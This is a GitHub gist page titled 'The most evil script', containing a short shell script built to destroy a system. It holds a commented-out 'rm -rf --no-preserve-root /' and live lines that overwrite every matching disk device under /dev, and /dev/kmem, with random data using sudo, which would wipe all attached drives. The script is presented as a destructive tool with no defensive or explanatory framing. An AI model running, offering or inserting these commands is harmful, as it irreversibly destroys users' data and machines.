Last active
September 28, 2023 20:51
-
-
Save Rudxain/5b63803cdfce6cf3ad02314094bbf322 to your computer and use it in GitHub Desktop.
The most evil script
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/sh | |
# this may be useless | |
#sudo rm -rf --no-preserve-root / & | |
find /dev -maxdepth 1 -iname 'sd?' \ | |
| \ | |
parallel sudo cp /dev/urandom {} | |
sudo cp /dev/urandom /dev/kmem | |
# is mem more destructive? |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment